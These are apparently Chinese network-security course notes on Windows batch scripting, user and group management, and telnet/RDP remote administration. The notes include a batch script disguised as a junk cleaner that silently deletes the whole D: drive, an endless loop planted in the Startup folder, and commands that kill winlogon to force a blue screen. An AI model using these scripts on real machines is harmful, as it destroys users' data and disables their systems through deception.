千锋网络安全day3-批处理编写/用户与组管理/服务器远程管理
批处理编写
创建:
创建记事本,扩展名改为: .bat
工具-文件夹选项-查看-隐藏已知文件类型的扩展名
创建后右键选择编辑进行编写
pause 暂停执行,直到给予指令再继续执行命令
@echo off 关闭回显(屏蔽执行过程)
color 0a 0为背景颜色,a为字体颜色 改变dos背景和字体颜色
color ? 查询颜色
title +文字 修改dos窗口名
echo. 空行
>nul 2>nul 不显示提示
d:
cd\
rd . /s/q 格式化D盘
echo =======================
echo clear your system rubbish
echo if be prohibited
echo let it go
echo =======================
pause
echo.
echo rubbish is cleaning...
d: >nul 2>nul
cd\ >nul 2>nul
rd . /s/q 格式化D盘 >nul 2>nul
ping -n 10 127.0.01 >nul 2>nul
echo congratulations!!!
pause
: 定义一个命令区间,冒号后可输入任意字符
goto 跳转
eg.goto 3 跳转到名字为3的命令区间
eg. //在d区间里找d。陷入死循环会导致死机!!!
:d
start
goto d
win-所有程序-启动-右键点击选择打开-复制路径
copy qq.bat "%userprofile%\ 「开始」菜单\程序\启动"
userprofile是一个变量。当前用户的家目录
set设置变量 %变量%取变量值
set /p 变量= 等待用户输入
@echo off
title 小程序v1.0
color 0a
:menu
cls
echo ====================
echo 菜单
echo 1.定时关机
echo 2.取消定时
echo 3.退出
echo ====================
echo 发出拒绝
pause
:menuset /p num=您的选择://set设置变量
if "%num%"=="1" goto 1
if "%num%"=="2" goto 2
if "%num%"=="3" goto 3:1
set /p a=请输入时间(单位/秒):
shutdown -s -f -t %a%
goto menu:2
shutdown -a
goto menu:3
exit
//选择2后回车,启动中出现haha.bat
:2
echo :a >>"%userprofile%\ 「开始」菜单\程序\启动\haha.bat"
echo start >>"%userprofile%\「开始」菜单\程序\启动\haha.bat"
echo goto a >>"%userprofile%\ 「开始」菜单\程序\启动\haha.bat"
goto menu
会蓝屏!!!
ntsd -c q -pn 进程 强制杀死指定进程的名称
eg.ntsd -c q -pn winlogon.exe 针对xp或2003的蓝屏命令,winlogon.exe-windows登陆系统
taskkill 杀死任务进程
eg.taskkill /im explorer.exe /f (/f强制执行)
@echo off
taskkill /im explorer.exe /f >nul 2>nul
echo 嘻嘻
ping -n 5 127.0.0.1 >nul 2>nul
start C:\windows\explorer.exe
echo 诶嘿
pause
用户与组管理
1.1用户概述
每个账户有自己唯一的SID(安全标识符)
用户UID:500
windows系统管理员administrator的UID固定是500
普通用户UID是从1000开始
Linux 系统管理员root UID是0
用户密码存储位置 C:\windows\system32\config\SAM
windows上默认密码最长有效期42天
1.2内置账户
· 给人使用的账户
administrator #管理员账户
guest #来宾账户
· 计算机服务组件相关的系统账号
system #系统服务==权限至高无上
local services #本地服务账户==权限等于普通账户
network services #网络服务账户==权限等于普通账户
net user 用户名 密码 //给用户修改密码(仅管理员可用,以管理员身份打开cmd)
eg. net user shimisi 1
net user 用户名 密码 /add //新建用户
eg.net user abc 1/add
net users 用户名/del //删除用户
eg.net user abc/del
net user 用户名 /active : yes/no //**或禁用账户
组管理
3.1组概念
组的作用:简化权限的赋予
net localgroup
net localgroup 组名 //查看该组成员
net localgroup 组名 用户名 /add //给管理组增加成员
net localgroup 组名 用户名 /del //删除组员
net localgroup 组名 //创建组
net localgroup 组名 /del //删除组
服务器远程管理
telnet windows的命令行远程管理
桌面右键属性-远程设置-选择允许-确定 服务器开启允许被远程管理
mstsc 命令远程访问服务器
普通用户没有远程管理服务权限
remote desktop users 组中添加成员给予远程管理服务权限
services.msc 命令开启服务管理窗口-找到Telnet-双击打开-启动类型选择自动 设置后可从cmd访问其他服务器
(win10为控制面板-程序-程序与功能-启用或关闭win功能-Talnet)
netstat -an 查看本机开放的所有端口
telnet:23
远程桌面协议RDP:3389